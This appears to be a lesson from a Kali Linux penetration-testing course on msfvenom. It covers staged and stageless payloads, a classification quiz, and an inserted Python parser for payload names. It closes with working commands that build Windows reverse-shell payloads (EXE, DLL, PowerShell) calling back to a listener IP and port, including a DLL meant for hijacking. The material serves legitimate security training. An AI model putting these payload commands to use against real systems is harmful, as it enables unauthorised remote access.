Originally published on Securityelites - AI Red Team Education, the canonical, fully-updated version of this article.
Day 27 of 180 · Kali Linux Mastery
Authorised Use Only. Msfvenom generates real offensive payloads. Use exclusively on systems you own or have written permission to test. All exercises target your own Metasploitable/DVWA labs only.
Msfvenom is the payload factory of every serious penetration tester. One command generates a Windows backdoor, a Linux reverse shell, or an Android APK: custom, encoded, and ready to execute. I'm walking you through the complete msfvenom tutorial today: payload types, encoding, listener setup, and a full end-to-end lab against your Metasploitable instance.
What You'll Master in Day 27
- What Msfvenom Is and How It Works
- Staged vs Stageless Payloads
- Windows Payload Generation
- Linux and Android Payloads
- Encoding: Shikata_Ga_Nai
- Multi/Handler Listener Setup
- Advanced: Embedding Into Templates
Yesterday on Day 26 I covered the Social-Engineer Toolkit for phishing and pretexting. Today we move into the payload itself: the executable code that opens the connection. Understanding the full Kali Linux course payload workflow makes everything from SET delivery to post-exploitation click into place.
What Msfvenom Is and How It Works
Msfvenom combines two older Metasploit tools, msfpayload (shellcode generation) and msfencode (obfuscation), into one faster, simpler command. When I run msfvenom, I specify three things: what the payload does (connect back, open a shell, execute commands), what format to deliver it in (EXE, ELF, APK, raw bytes), and optionally how to encode it to reduce antivirus detection. Every payload has three mandatory parameters: the payload module (-p), the callback IP (LHOST), and the callback port (LPORT).
Core msfvenom syntax
msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <format> -o <output file>
List all payloads
$ msfvenom -l payloads | grep windows/meterpreter
windows/meterpreter/reverse_tcp # staged
windows/meterpreter_reverse_tcp # stageless
windows/x64/meterpreter/reverse_tcp # 64-bit staged
windows/meterpreter/reverse_https # encrypted
List all output formats
$ msfvenom --list formats
exe, elf, apk, dll, ps1, py, raw, war, aspx, jar...
Msfvenom syntax and payload listing. The -l payloads command shows all available modules. I always grep for the platform I'm targeting: grepping for "windows/meterpreter" filters to the most commonly used payload family.
Core Concept: The payload is WHAT happens. The format is HOW it's delivered. The encoder is how it LOOKS to defences. Master these three independently and you can build any payload configuration you need.
Staged vs Stageless: The Slash vs Underscore Rule
The most important distinction in msfvenom, and the one every beginner gets wrong, is staged versus stageless payloads. My fast rule: the slash in the payload name tells you which type you have. windows/meterpreter/reverse_tcp has a slash between meterpreter and reverse_tcp, so it is staged. windows/meterpreter_reverse_tcp joins meterpreter and reverse_tcp with an underscore, so it is stageless. This rule applies to every platform: Windows, Linux, Android.
Staged vs Stageless: Decision Reference
STAGED (has slash /)
windows/meterpreter/reverse_tcp
- Small stager sent (~300 bytes)
- Fetches full payload at runtime
- Smaller file size on disk
- Needs stable network for stage 2
Use for: stable labs, small size
STAGELESS (underscores only)
windows/meterpreter_reverse_tcp
- Complete payload in one file
- No second stage download
- Larger file size on disk
- Better through strict firewalls
Use for: real engagements, firewalls
Staged vs stageless payload decision reference. In lab environments I default to staged: smaller files, faster iteration. In real engagements where I'm uncertain about the network path between target and listener, I switch to stageless to avoid the second-stage download being blocked by a firewall or proxy.
EXERCISE 1: THINK LIKE A HACKER (2 MIN)
Identify Staged vs Stageless From Payload Names
Classify each as Staged (S) or Stageless (SL):
1. windows/x64/meterpreter/reverse_tcp
2. windows/meterpreter_reverse_https
3. linux/x86/meterpreter/reverse_tcp
4. android/meterpreter_reverse_tcp
5. windows/shell/reverse_tcp
Answers: 1=S 2=SL 3=S 4=SL 5=S
Learned: Slash = staged, underscore-only = stageless. Works for every platform in msfvenom.
Share your completed quiz in #kali-linux-course on Discord!
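The slash-versus-underscore rule above, written as a small parser that also tells a reviewer whether a second-stage transfer should be expected on the wire. This is an added example, not code from the original article or from Metasploit; the function and field names are assumptions, and it covers only the meterpreter and shell families that appear on this page.

```python
import re
from typing import NamedTuple, Optional

# Assumption: only the two payload families named on this page are covered.
FAMILIES = ("meterpreter", "shell")
TRANSPORT = re.compile(r"^(reverse|bind)_[a-z0-9_]+$")


class Payload(NamedTuple):
    platform: str
    arch: Optional[str]
    family: str
    transport: str
    kind: str  # "staged" or "stageless"


def classify(name: str) -> Payload:
    """Apply the slash-vs-underscore rule to one payload module name."""
    parts = name.strip().split("/")
    if len(parts) < 2 or not all(parts):
        raise ValueError(f"not a payload module name: {name!r}")
    last = parts[-1]
    # Stageless: family and transport share the final component.
    for fam in FAMILIES:
        rest = last[len(fam) + 1:]
        if last.startswith(fam + "_") and TRANSPORT.match(rest):
            head = parts[:-1]
            arch = head[1] if len(head) > 1 else None
            return Payload(head[0], arch, fam, rest, "stageless")
    # Staged: family and transport are separate path components.
    if len(parts) >= 3 and parts[-2] in FAMILIES and TRANSPORT.match(last):
        head = parts[:-2]
        arch = head[1] if len(head) > 1 else None
        return Payload(head[0], arch, parts[-2], last, "staged")
    # Names with slashes but no family/transport pair are outside the rule.
    raise ValueError(f"rule does not cover: {name!r}")


def expects_second_stage(name: str) -> bool:
    """True when the payload fetches its main stage over the network."""
    return classify(name).kind == "staged"


if __name__ == "__main__":
    # The five names from Exercise 1 on this page.
    for n in ("windows/x64/meterpreter/reverse_tcp", "windows/meterpreter_reverse_https",
              "linux/x86/meterpreter/reverse_tcp", "android/meterpreter_reverse_tcp",
              "windows/shell/reverse_tcp"):
        print(f"{n:40} {classify(n).kind}")
```

A name such as cmd/unix/reverse_bash contains slashes but no family/transport pair, so the parser rejects it instead of guessing.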
Windows Payload Generation
Windows is the most common target in penetration tests. Msfvenom generates EXE, DLL, PowerShell, and raw shellcode payloads for Windows targets. My workflow for every Windows payload: generate with the correct architecture (x86 for 32-bit, x64 for 64-bit), set LHOST to my Kali IP on the lab network, set a port that isn't commonly blocked, and match the format to the delivery method.
WINDOWS PAYLOAD COMMANDS
# 32-bit Windows reverse TCP (most common)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f exe -o shell32.exe
# 64-bit Windows reverse TCP
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f exe -o shell64.exe
# HTTPS payload: encrypted callback
msfvenom -p windows/meterpreter/reverse_https \
LHOST=192.168.1.100 LPORT=443 -f exe -o shell_https.exe
# DLL payload for DLL hijacking
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f dll -o malicious.dll
# PowerShell payload: fileless approach
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f ps1 -o shell.ps1